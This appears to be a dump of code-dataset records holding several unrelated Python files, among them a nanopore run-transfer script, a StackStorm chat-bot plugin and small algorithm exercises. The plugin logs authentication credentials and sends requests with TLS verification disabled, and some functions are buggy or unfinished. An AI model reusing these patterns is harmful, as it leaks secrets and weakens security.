for top_dir in os.listdir(minion_data_dir)\n if os.path.isdir(os.path.join(minion_data_dir, top_dir))\n and top_dir not in skip_dirs\n ]\n except OSError:\n logger.warning(\n \"There was an issue locating the following directory: {}. \"\n \"Please check that it exists and try again.\".format(minion_data_dir)\n )\n # Get the actual location of the run directories in /var/lib/MinKnow/data/QC_runs/USERDETERMINEDNAME/USERDETSAMPLENAME/run\n if found_top_dirs:\n for top_dir in found_top_dirs:\n if os.path.isdir(top_dir):\n for sample_dir in os.listdir(top_dir):\n if os.path.isdir(os.path.join(top_dir, sample_dir)):\n for run_dir in os.listdir(os.path.join(top_dir, sample_dir)):\n found_run_dirs.append(\n os.path.join(top_dir, sample_dir, run_dir)\n )\n else:\n logger.warning(\n \"Could not find any run directories in {}\".format(minion_data_dir)\n )\n return found_run_dirs\n\n\ndef find_ont_transfer_runs(ont_data_dir, skip_dirs):\n \"\"\"Find runs in ngi-nas.\n These are assumed to be flowcell dirs, not project dirs.\n \"\"\"\n try:\n found_dirs = [\n os.path.join(ont_data_dir, top_dir)\n for top_dir in os.listdir(ont_data_dir)\n if os.path.isdir(os.path.join(ont_data_dir, top_dir))\n and top_dir not in skip_dirs\n ]\n except OSError:\n logger.warning(\n \"There was an issue locating the following directory: {}. \"\n \"Please check that it exists and try again.\".format(ont_data_dir)\n )\n return found_dirs\n\n\ndef process_minion_qc_run(minion_run):\n \"\"\"Process MinION QC runs on Squiggle.\n \"\"\"\n logger.info(\"Processing QC run: {}\".format(minion_run.run_dir))\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n if not len(minion_run.summary_file):\n logger.info(\n \"Sequencing is still ongoing for run {}. Skipping.\".format(\n minion_run.run_id\n )\n )\n return\n \n if (\n len(minion_run.summary_file)\n and os.path.isfile(minion_run.summary_file[0])\n and not os.path.isdir(minion_run.anglerfish_dir)\n ):\n logger.info(\n \"Sequencing is done for run {}. Attempting to start Anglerfish.\".format(\n minion_run.run_id\n )\n )\n if not minion_run.anglerfish_sample_sheet:\n minion_run.anglerfish_sample_sheet = minion_run.get_anglerfish_samplesheet()\n \n if minion_run.anglerfish_sample_sheet and os.path.isfile(minion_run.anglerfish_sample_sheet):\n minion_run.start_anglerfish()\n else:\n logger.warning(\n \"Anglerfish sample sheet missing for run {}. \"\n \"Please provide one using --anglerfish_sample_sheet \"\n \"or complete the correct lims step.\".format(minion_run.run_id)\n )\n elif not os.path.isfile(minion_run.anglerfish_exit_status_file):\n logger.info(\n \"Anglerfish has started for run {} but is not yet done. Skipping.\".format(\n minion_run.run_id\n )\n )\n elif os.path.isfile(minion_run.anglerfish_exit_status_file):\n anglerfish_successful = minion_run.check_exit_status(\n minion_run.anglerfish_exit_status_file\n )\n if anglerfish_successful:\n if minion_run.copy_results_for_lims():\n logger.info(\n \"Anglerfish finished OK for run {}. Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = (\n \"Anglerfish successfully processed run {}\".format(\n minion_run.run_id\n )\n )\n email_message = (\n \"Anglerfish has successfully finished for run {}. Please \"\n \"finish the QC step in lims.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Anglerfish has successfully finished for run {} but an error \"\n \"occurred while transferring the results to lims.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n if minion_run.is_not_transferred():\n if minion_run.transfer_run():\n if minion_run.update_transfer_log():\n logger.info(\n \"Run {} has been synced to the analysis cluster.\".format(\n minion_run.run_id\n )\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been transferred, but an error occurred while updating \"\n \"the transfer log\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n\n if minion_run.archive_run():\n logger.info(\n \"Run {} is finished and has been archived. Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = \"Run successfully processed: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, transferred and archived \"\n \"successfully.\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"archiving\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n else:\n logger.warning(\n \"An error occurred during transfer of run {} \"\n \"to the analysis cluster. Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"transfer to the analysis cluster.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n logger.warning(\n \"The following run has already been transferred, \"\n \"skipping: {}\".format(minion_run.run_id)\n )\n\n else:\n logger.warning(\n \"Anglerfish exited with a non-zero exit status for run {}. \"\n \"Notifying operator.\".format(minion_run.run_id)\n )\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Anglerfish exited with errors for run {}. Please \"\n \"check the log files and restart.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n return\n\n\ndef process_minion_delivery_run(minion_run):\n \"\"\"Process minion delivery runs on Squiggle.\"\"\"\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n logger.info(\"Processing run {}\".format(minion_run.run_id))\n minion_run.dump_path()\n if not len(minion_run.summary_file): # Run not finished, only rsync\n minion_run.transfer_run()\n else: # Run finished, rsync and archive\n if minion_run.transfer_run():\n finished_indicator = minion_run.write_finished_indicator()\n destination = os.path.join(\n minion_run.transfer_details.get(\"destination\"), minion_run.run_id\n )\n sync_finished_indicator = [\"rsync\", finished_indicator, destination]\n process_handle = subprocess.run(sync_finished_indicator)\n minion_run.archive_run()\n logger.info(\"Run {} has been fully transferred.\".format(minion_run.run_id))\n email_subject = \"Run successfully processed: {}\".format(minion_run.run_id)\n email_message = (\n \"Run {} has been transferred and archived \" \"successfully.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n logger.warning(\n \"An error occurred during transfer of run {}.\".format(minion_run.run_id)\n )\n email_subject = \"Run processed with errors: {}\".format(minion_run.run_id)\n email_message = (\n \"An error occurred during the \" \"transfer of run {}.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n\ndef transfer_ont_run(ont_run):\n \"\"\"Transfer ONT runs to HPC cluster.\"\"\"\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n logger.info(\"Processing run {}\".format(ont_run.run_id))\n\n # Update StatusDB\n try:\n ont_run.update_db()\n except Exception as e:\n logger.warning(f\"Database update for run {ont_run.run_id} failed\")\n email_subject = \"Run processed with errors: {}\".format(ont_run.run_id)\n email_message = (\n f\"An error occured when updating statusdb with run {ont_run.run_id}.\\n{e}\"\n )\n send_mail(email_subject, email_message, email_recipients)\n\n if os.path.isfile(ont_run.sync_finished_indicator):\n logger.info(\n \"Sequencing done for run {}. Attempting to start processing.\".format(\n ont_run.run_id\n )\n )\n if ont_run.is_not_transferred():\n\n # Copy metadata\n try:\n ont_run.transfer_metadata()\n logger.info(\n f\"Metadata of run {ont_run.run_id} has been synced to {ont_run.metadata_dir}\"\n )\n except BaseException as e:\n email_subject = f\"Run processed with errors: {ont_run.run_id}\"\n email_message = f\"Run {ont_run.run_id} has been analysed, but an error occurred when copying the metadata: \\n{str(e)}\"\n send_mail(email_subject, email_message, email_recipients)\n\n # Transfer run\n if ont_run.transfer_run():\n if ont_run.update_transfer_log():\n logger.info(\n \"Run {} has been synced to the analysis cluster.\".format(\n ont_run.run_id\n )\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been transferred, but an error occurred while updating \"\n \"the transfer log\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n if ont_run.archive_run():\n logger.info(\n \"Run {} is finished and has been archived. \"\n \"Notifying operator.\".format(ont_run.run_id)\n )\n email_subject = \"Run successfully processed: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been transferred and archived \" \"successfully.\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n email_subject = \"Run processed with errors: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"archiving\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n else:\n email_subject = \"Run processed with errors: {}\".format(ont_run.run_id)\n email_message = (\n \"An error occurred during transfer of run {} \"\n \"to the analysis cluster.\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n else:\n logger.warning(\n \"The following run has already been transferred, \"\n \"skipping: {}\".format(ont_run.run_id)\n )\n else:\n logger.info(\n \"Run {} not finished sequencing yet. Skipping.\".format(ont_run.run_id)\n )\n\n\ndef process_minion_qc_runs(run, anglerfish_sample_sheet):\n \"\"\"Find and process MinION QC runs on Squiggle.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n minion_run = MinIONqc(\n os.path.abspath(run), anglerfish_sample_sheet\n )\n process_minion_qc_run(minion_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n nanopore_data_dir = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_qc_run\").get(\"data_dir\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_qc_run\").get(\"ignore_dirs\")\n )\n runs_to_process = find_minion_runs(nanopore_data_dir, skip_dirs)\n for run_dir in runs_to_process:\n minion_run = MinIONqc(\n run_dir, anglerfish_sample_sheet\n )\n process_minion_qc_run(minion_run)\n\n\ndef process_minion_delivery_runs(run):\n \"\"\"Find MinION delivery runs on Squiggle and transfer them to ngi-nas.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n minion_run = MinIONdelivery(os.path.abspath(run))\n process_minion_delivery_run(minion_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n minion_data_dir = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_delivery_run\").get(\"data_dir\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\")\n .get(\"minion_delivery_run\")\n .get(\"ignore_dirs\")\n )\n runs_to_process = find_minion_runs(minion_data_dir, skip_dirs)\n for run_dir in runs_to_process:\n minion_run = MinIONdelivery(run_dir)\n process_minion_delivery_run(minion_run)\n\n\ndef transfer_finished(run):\n \"\"\"Find finished ONT runs in ngi-nas and transfer to HPC cluster.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n if \"minion\" in run:\n ont_run = MinionTransfer(os.path.abspath(run))\n elif \"promethion\" in run:\n ont_run = PromethionTransfer(os.path.abspath(run))\n transfer_ont_run(ont_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n # Locate all runs in /srv/ngi_data/sequencing/promethion and /srv/ngi_data/sequencing/minion\n ont_data_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"ont_transfer\").get(\"data_dirs\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"ont_transfer\").get(\"ignore_dirs\")\n )\n for data_dir in ont_data_dirs:\n runs_to_process = find_ont_transfer_runs(data_dir, skip_dirs)\n for run_dir in runs_to_process:\n if \"minion\" in data_dir:\n ont_run = MinionTransfer(run_dir)\n transfer_ont_run(ont_run)\n elif \"promethion\" in data_dir:\n ont_run = PromethionTransfer(run_dir)\n transfer_ont_run(ont_run)\n\n\ndef ont_updatedb_from_cli(run):\n\n if is_date(os.path.basename(run).split(\"_\")[0]):\n if \"minion\" in run:\n ont_run = MinionTransfer(os.path.abspath(run))\n elif \"promethion\" in run:\n ont_run = PromethionTransfer(os.path.abspath(run))\n ont_run.update_db(force_update=True)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n","sub_path":"taca/analysis/analysis_nanopore.py","file_name":"analysis_nanopore.py","file_ext":"py","file_size_in_byte":19032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624986139","text":"# coding:utf-8\nimport six\nimport json\nimport time\nimport pprint\nimport logging\nimport requests\nimport sseclient\nimport subprocess\n\nfrom st2pluginauth import St2PluginAuth\nfrom st2client.client import Client\nfrom st2pluginactionaliasparser import St2PluginActionAliasParser\nfrom st2client.models.action_alias import ActionAliasMatch\nfrom st2client.models.aliasexecution import ActionAliasExecution\nfrom requests.exceptions import HTTPError\nLOG = logging.getLogger(__name__)\n\n\nclass St2PluginAPI(object):\n def __init__(self, st2config):\n self.st2config = st2config\n self.st2auth = St2PluginAuth(st2config)\n self.parser = St2PluginActionAliasParser(st2config.full_prefix)\n\n def show_help(self):\n \"\"\"\n Pass-through to action alias parser.\n \"\"\"\n # curl -v -H \"X-Auth-Token: $ST2_AUTH_TOKEN\"\n # -H 'Content-Type: application/json'\n # -XPOST localhost:9101/v1/actionalias/help -d '{}'\n return self.parser.show_help()\n\n def match(self, text):\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n auth_kwargs['debug'] = False\n\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n **auth_kwargs)\n\n alias_match = ActionAliasMatch()\n alias_match.command = text\n\n try:\n return st2_client.managers['ActionAlias'].match(alias_match)\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 400:\n print(\"No match found\")\n else:\n print(\"HTTPError %s\" % e)\n return None\n\n def run_action(self, action, **kwargs):\n \"\"\"\n Perform the system call to execute the Stackstorm action.\n \"\"\"\n opt, auth = self.st2auth.auth_method(\"st2\").popitem()\n cmd = ['/opt/stackstorm/st2/bin/st2',\n '--url={}'.format(self.st2config.base_url),\n '--auth-url={}'.format(self.st2config.auth_url),\n '--api-url={}'.format(self.st2config.api_url),\n '--api-version={}'.format(self.st2config.api_version),\n 'run',\n '-j',\n '{}'.format(opt),\n '{}'.format(auth),\n '{}'.format(action)]\n for k, v in six.iteritems(kwargs):\n cmd.append('{}={}'.format(k, v))\n\n sp = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd='/opt/stackstorm/st2/bin')\n output = sp.communicate()[0].strip().decode('utf-8')\n returncode = sp.returncode\n LOG.info(output)\n return output\n\n def action_execution(self, msg, action_ref, action_alias, **kwargs):\n \"\"\"\n Execute actions via api\n @action - Action reference.\n @msg - Errbot's chat message.\n @kwargs - a dict containing 0 or more arguments to be provided when calling the action.\n \"\"\"\n\n LOG.info(\"\\u001b[35m Action={} kwargs={} \\u001b[0m\".format(action_alias.name, kwargs))\n\n # run packs.info pack=livestatus\n # Step 1. Fetch action metadata\n # http://127.0.0.1:9101/v1/actions/packs.info\n\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n **auth_kwargs)\n\n LOG.info(\"\\u001b[35m {} {}\\u001b[0m\".format(action_ref, kwargs))\n action_meta = st2_client.actions.get_by_id(action_ref)\n if not action_meta.enabled:\n return \"{}.{} won't execute because it's disabled.\".format(action_meta.pack,\n action_meta.name)\n LOG.info(\"\\u001b[35m action_meta={}\\u001b[0m\".format(action_meta))\n\n # Step 2. Extract runner-type (and validate parameters)\n # \"runner_type\" : \"python-script\",\n # action_meta=\n runnertype_meta = st2_client.runners.get_by_name(action_meta.runner_type)\n LOG.info(\"\\u001b[35m runnertype_meta={}\\u001b[0m\".format(runnertype_meta))\n\n # Step 3. Fetch runner-type metadata\n # http://127.0.0.1:9101/v1/runnertypes/?name=python-script\n #\n # Step 4. Not sure what to do with runner-type metadata\n #\n # Step 5. Call execute API with JSON payload containing parameters\n # '{\"action\": \"packs.info\", \"user\": null, \"parameters\":\n # {\"pack\": \"livestatus\"}}' http://127.0.0.1:9101/v1/executions\n LOG.info([action_meta.pack, action_meta.name, msg.body, msg.frm, msg.channelname])\n\n url = self.st2config.api_url+\"executions\"\n payload = {\n 'action': \"{}.{}\".format(action_meta.pack, action_meta.name),\n 'format': \"xxxx\",\n 'command': msg.body,\n 'user': str(msg.frm),\n 'parameters': {\"pack\": action_meta.pack},\n 'source_channel': msg.channelname,\n 'notification_route': 'errbot'\n }\n\n payload = \"{} {} {}\".format(str(dir(action_meta)),\n str(dir(msg)),\n str(dir(runnertype_meta)))\n\n LOG.info(\"\\u001b[35m PAYLOAD={}\\u001b[0m\".format(payload))\n r = requests.post(url, json=payload, verify=False)\n LOG.info(r)\n # Step 6. Get the state of the execution http://127.0.0.1:9101/v1/executions/\n return {\n \"url\": url,\n \"payload\": str(payload),\n \"runnertype_meta\": str(runnertype_meta),\n \"action_meta\": str(action_meta),\n \"ebbot_msg\": str(msg)\n }\n raise NotImplementedError\n\n def execute_actionalias(self, action_alias, representation, msg):\n \"\"\"\n @action_alias: the st2client action_alias object.\n @representation: the st2client representation for the action_alias.\n @msg: errbot message.\n \"\"\"\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n debug=True,\n **auth_kwargs)\n\n execution = ActionAliasExecution()\n execution.name = action_alias.name\n execution.format = representation\n execution.command = msg.body\n if msg.is_direct == False:\n execution.notification_channel = str(msg.to)\n execution.source_channel = str(msg.to)\n else:\n execution.notification_channel = str(msg.frm)\n execution.source_channel = str(msg.frm)\n\n execution.notification_route = 'errbot'\n execution.user = str(msg.frm)\n\n LOG.info(\"Execution: {}\".format([execution.command,\n execution.format,\n execution.name,\n execution.notification_channel,\n execution.notification_route,\n execution.source_channel,\n execution.user]))\n\n action_exec_mgr = st2_client.managers['ActionAliasExecution']\n execution = action_exec_mgr.create(execution)\n\n LOG.info(\"AFTER {}{}\".format(type(execution), dir(execution)))\n try:\n ret_msg = execution.message\n LOG.info(\"AFTER {}{}\".format(execution.execution, execution.message))\n except AttributeError as e:\n ret_msg = \"Something is happening ... \"\n return ret_msg # \" \".join([execution.message])\n\n def st2stream_listener(self, callback=None):\n \"\"\"\n Listen for events passing through the stackstorm bus\n \"\"\"\n LOG.info(\"\\u001b[35m Starting stream listener \\u001b[0m\")\n\n def listener(callback=None):\n headers = self.st2auth.auth_method(\"requests\")\n headers.update({'Accept': 'text/event-stream'})\n\n response = requests.get(self.st2config.stream_url, headers=headers, stream=True)\n\n client = sseclient.SSEClient(response)\n for event in client.events():\n data = json.loads(event.data)\n if event.event in [\"st2.announcement__errbot\"]:\n LOG.info(\"\\u001b[35mErrbot announcement event detected!\\u001b[0m\")\n channel = data[\"payload\"].get('channel')\n message = data[\"payload\"].get('message')\n\n user = data[\"payload\"].get('user')\n whisper = data[\"payload\"].get('whisper')\n extra = data[\"payload\"].get('extra')\n\n callback(whisper, message, user, channel, extra)\n\n while True:\n try:\n listener(callback)\n except Exception as e:\n LOG.critical(\"St2 stream listener - An error occurred: %s\" % e)\n time.sleep(60)\n\n def generate_actionaliases(self):\n \"\"\"\n A wrapper method to check for API access authorisation.\n \"\"\"\n try:\n if not self.st2auth.valid_credentials():\n self.st2auth.renew_token()\n except requests.exceptions.HTTPError as e:\n LOG.info(\"Error while validating credentials %s (%s)\" % (e.reason, e.code))\n\n try:\n self._generate_actionaliases()\n except Exception as e:\n LOG.error(\"Error while fetching action aliases %s\" % e)\n\n def _generate_actionaliases(self):\n \"\"\"\n generate pattern and help for action alias\n \"\"\"\n self.help = ''\n self.pattern_action = {}\n\n base_url = self.st2config.base_url\n api_url = self.st2config.api_url\n\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"\\u001b[35m Create st2 client with {} {} {} \\u001b[0m\".format(base_url,\n api_url,\n auth_kwargs))\n st2_client = Client(base_url=base_url, api_url=api_url, **auth_kwargs)\n self.parser.process_actionaliases(st2_client.managers['ActionAlias'].get_all())\n","sub_path":"st2pluginapi.py","file_name":"st2pluginapi.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"54926598","text":"import csv\nimport pandas as pd\nimport sys\nimport numpy as np\n\npredict_result_dir = \"./2019ncov_albert_base_zh_google/test_results.tsv\"\ntest_data_dir = \"./chineseGLUEdatasets/2019ncov/processed_test.txt\"\ncsv_result_dir = \"./2019ncov_albert_base_zh_google/test_result_albert.csv\"\n\npredict_result = pd.read_csv(predict_result_dir, header=None)\n\n# 第0个位置对应标签“-1”,第1个位置对应标签“0”,第2个位置对应标签“1”,\nposition_label_map = {0: -1, 1: 0, 2: 1}\nlabel_list = []\nfor i in range(len(predict_result)):\n possible_list = list(predict_result.loc[i])[0].split(\"\\t\")\n label = position_label_map[np.argmax(possible_list)]\n label_list.append(label)\n\nwbid_list = []\nwith open(test_data_dir, \"r\",encoding=\"utf-8\") as f:\n for line in f.readlines():\n wbid = line.split(\"__\")[0]\n wbid_list.append(wbid)\n\nwith open(csv_result_dir, \"w\", encoding=\"utf-8\", newline=\"\") as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([\"id\", \"y\"])\n for i in range(len(wbid_list)):\n writer.writerow([wbid_list[i], label_list[i]])\n\n","sub_path":"albert_google/write_result_to_csv.py","file_name":"write_result_to_csv.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"60524520","text":"def compare_versions(v1, v2):\n \"\"\"\n This returns latest version\n \"\"\"\n arr1 = v1.split(\".\")\n arr2 = v2.split(\".\")\n i = 0\n res = -1\n while i < len(arr1) or i < len(arr2):\n if int(arr1[i]) > int(arr2[i]):\n return v1\n elif int(arr2[i]) > int(arr1[i]):\n return v2\n i += 1\n return res\n\n\nif __name__ == \"__main__\":\n m = input()\n n = input()\n print(compare_versions(m, n))\n","sub_path":"src/main/java/version_compare.py","file_name":"version_compare.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321325590","text":"'''\r\nRealiza un programa que pida al usuario un número entero del 0 al 9, y que mientras el número no sea correcto se repita el proceso. \r\nLuego debe comprobar si el número se encuentra en la lista de números y notificarlo. \r\nSugerencia: La sintaxis valor in lista permite comprobar fácilmente si un valor se encuentra en una lista (devuelve True o False)\r\nInstrucciones\r\nPara la solución de este problema, se requiere que el usuario escriba un script y utilice la estructura While.\r\nSe debe tener como prueba una lista llamada numero=[1,2,3] Con números enteros del 0 al 9. \r\nSe debe solicitar al usuario ingresar el número que quiera comprobar. \r\nEjemplo, si la lista de números tiene la siguiente estructura: numero=[1,3,5,9] y se ingresa por consola el numero 8, \r\ndebe salir un mensaje que diga que él numero 8 no se encuentra en la lista. Si el número que se coloca está en la lista, \r\nsale un mensaje que indique, el numero x esta en la lista\r\n'''\r\nnum = int(input(\"Ingrese un número entero del 0 al 9: \"))\r\nnumero = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n\r\nwhile num not in list(numero):\r\n num = int(input(\"Ingrese un número entero del 0 al 9: \"))\r\nelse:\r\n print(\"El numero\", num, \"está en la lista.\")","sub_path":"Ejer. Manejo de While.py","file_name":"Ejer. Manejo de While.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"654214250","text":"# https://leetcode-cn.com/problems/largest-rectangle-in-histogram/\nfrom util.common_imports import *\nclass Solution:\n def largestRectangleArea(self, A: List[int]) -> int:\n if len(A) == 0:\n return 0\n\n res = A[0]\n for i in range(len(A)):\n if i == 0:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n\n cur = A[i] * (j - i) # A[i]为宽的矩形\n res = max(res, cur)\n continue\n\n if A[i] < A[i-1]:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n k = i - 1\n while k >= 0 and A[k] >= A[i]: # find A[k] < A[i] and stop\n k -= 1\n cur = A[i] * (j - (k + 1))\n res = max(res, cur)\n elif A[i] > A[i-1]:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n\n cur = A[i] * (j - i) # A[i]为宽的矩形\n res = max(res, cur)\n return res\n\n# print (Solution().largestRectangleArea([2,1,5,6,2,3]))\n# print (Solution().largestRectangleArea([4,2]))\nprint (Solution().largestRectangleArea([2,1,2]))\n\n# 超出时间限制","sub_path":"stack/mono_stack 单调栈/84_largestRectangelArea.py","file_name":"84_largestRectangelArea.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"371857966","text":"def selection_sort(arr):\n # loop through n-1 elements\n for i in range(0, len(arr) - 1):\n # Create the index and hldr for the smallest index\n cur_index = i\n smallest_index = cur_index\n # Loop through the remaining array\n for x in range(i+1, len(arr)):\n # If the smallest index is larger than the next in line\n # then replace the next in line with smallest\n if arr[smallest_index] > arr[x]:\n smallest_index = x\n\n hldr = arr[i]\n arr[i] = arr[smallest_index]\n arr[smallest_index] = hldr\n\n return arr\n\n\ndef bubble_sort(arr):\n for x in range(len(arr)):\n for i in range(0, len(arr)-x-1):\n if arr[i] > arr[i+1]:\n arr[i], arr[i+1] = arr[i+1], arr[i]\n\n return arr\n\n\n# STRETCH: implement the Count Sort function below\ndef count_sort(arr, maximum=-1):\n # Check if entered array is empty\n if len(arr) == 0:\n # If true, also return empty array\n return []\n # Check if the smallest value is negative\n if min(arr) < 0:\n # If trye, return error message\n return 'Error, negative numbers not allowed in Count Sort'\n\n # If the maximum is entered, use that value instead\n if maximum == -1:\n maximum = max(arr)\n\n # Create array with integer key values from 0 to the max\n elements = maximum + 1\n count_array = [0] * elements\n\n # Count occurences of each value\n for x in arr:\n count_array[x] += 1\n\n # Initalize loop to add sourted to the output\n i = 0\n # Interate through each value in the count_array\n for x in range(elements):\n # Count number of each value\n for y in range(count_array[x]):\n arr[i] = x\n i += 1\n return arr\n","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189262895","text":"from linkedlist.IntersectionOfTwoLinkedList.main import ListNode, get_length, Solution\n\n\ndef test_get_length():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n assert get_length(head) == 3\n\n\ndef test_main():\n head1 = ListNode(1)\n head1.next = ListNode(2)\n head1.next.next = ListNode(3)\n head1.next.next.next = ListNode(4)\n head2 = ListNode(5)\n head2.next = head1.next.next\n intersection = head1.next.next\n solution = Solution()\n assert solution.getIntersectionNode(head1, head2) == intersection\n","sub_path":"linkedlist/IntersectionOfTwoLinkedList/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558152266","text":"# Problem: Implement Breadth-first search.\nfrom graph import Graph\nfrom collections import deque\n\n\nclass GraphBfs(Graph):\n\n def bfs(self, root, visit_func):\n # visit fun is passed a node every time a new node is reached\n if root is None:\n return\n queue = deque()\n queue.append(root)\n while queue:\n node = queue.popleft()\n visit_func(node)\n for neighbor in node.adj_nodes.values():\n if not neighbor.visited:\n neighbor.was_visited()\n queue.append(neighbor)\n","sub_path":"graphs_trees/bfs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"495508058","text":"#-*-coding:utf-8-*-\nfrom being.models import getuserbyname,getcounterpart,getking,getqueen\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom examination import forms\nfrom examination.models import *\nfrom django.contrib.auth.decorators import login_required\nfrom being.models import getadmin\n@login_required\ndef exam_take(request,eid):\n context=RequestContext(request)\n if request.method=='GET':\n # for sake of example use .get\n exam = getexam(eid)\n hastaken=False\n if exam.hastakenby(request.user):\n hastaken=True\n forms = [q.get_form()(prefix=str(q.id),\n content_object=request.user,\n question=q, form_tag=False)\n for q in exam.questions.all().get_real_instances()\n ]\n # form is a list of TextQuestionForm or ChoiceQuestionForm\n return render_to_response('exam_form.html',{'forms':forms,'exam':exam,'hastaken':hastaken},context)\n\n@login_required\ndef exam_save(request, eid):\n # for sake of example use .get\n exam = getexam(eid)\n forms = [q.get_form()(request.POST or None,\n prefix=str(q.id),\n content_object=request.user,\n question=q, form_tag=False)\n for q in exam.questions.all().get_real_instances()\n ]\n forms_are_valid = []\n for form in forms:\n valid = form.is_valid()\n forms_are_valid.append(valid)\n if valid:\n t = form.save()\n forms_are_valid = all(forms_are_valid)\n if 